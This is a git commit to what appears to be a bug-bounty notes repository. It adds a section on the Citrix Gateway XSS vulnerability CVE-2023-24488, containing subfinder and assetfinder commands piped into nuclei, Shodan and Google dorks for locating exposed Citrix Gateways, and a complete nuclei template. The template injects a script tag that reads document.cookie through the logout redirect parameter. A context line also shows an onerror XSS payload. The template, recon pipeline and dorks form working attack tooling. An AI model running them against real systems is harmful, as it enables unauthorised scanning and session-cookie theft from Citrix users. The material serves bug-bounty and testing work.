GITBOOK-51: change request with no subject merged in GitBook

This commit is contained in:
Xalgord 2023-07-25 11:16:45 +00:00 committed by gitbook-bot
parent 692f151b2b
commit aedb40ca27
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
3 changed files with 61 additions and 0 deletions

View file

@ -359,6 +359,21 @@ GET /?q=xss POST /q=xss
<iMg src%3dN onerror%3dalert(0x000D98)>
```
### Nuclei CVE-2023-24488 Citrix XSS - Easy Bug Bounty
**Command**:\
subfinder -d [target.com](http://target.com/) -silent | nuclei -t http/cves/2023/CVE-2023-24488.yaml\
\
assetfinder [target.com](http://target.com/) | nuclei -t http/cves/2023/CVE-2023-24488.yaml\
\
**Template**: [xss-nuclei-template-cve-2023-24488.yaml.md](xss-nuclei-template-cve-2023-24488.yaml.md "mention")\
\
**Shodan Dork**:\
ssl:[target.com](http://target.com/) title:"Citrix gateway"\
\
**Dork**:\
intitle:"Citrix Gateway" -site:[citrix.com](http://citrix.com/)
### Some awesome people on twitter
* [@Dark\_Knight](https://twitter.com/\_Dark\_Knight\_)

View file

@ -13,3 +13,4 @@
* [🔎 How I hacked NASA and got 8 bugs ?](recon-strategies-by-other-hackers/how-i-hacked-nasa-and-got-8-bugs.md)
* [🔎 Simple Recon Methodology](recon-strategies-by-other-hackers/simple-recon-methodology.md)
* [🌀 Possible "Content-Type" Header values](possible-content-type-header-values.md)
* [🎯 XSS nuclei template CVE-2023-24488.yaml](xss-nuclei-template-cve-2023-24488.yaml.md)

View file

@ -0,0 +1,45 @@
# 🎯 XSS nuclei template CVE-2023-24488.yaml
```yaml
id: CVE-2023-24488
info:
name: CVE-2023-24488
author: assetnote
severity: medium
description: description
reference:
- https://blog.assetnote.io/2023/06/29/citrix-xss-advisory/
tags: tags
requests:
- raw:
- |+
GET /oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1
Host: {{Hostname}}
Cookie: NSC_TASS=/Citrix
Cache-Control: max-age=0
Sec-Ch-Ua: "Not.A/Brand";v="8", "Chromium";v="114", "Brave";v="114"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Sec-Gpc: 1
Accept-Language: en-GB,en
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Connection: close
matchers-condition: and
matchers:
- type: word
part: body
words:
- <script>alert(document.cookie)</script>
- type: status
status:
- 302
```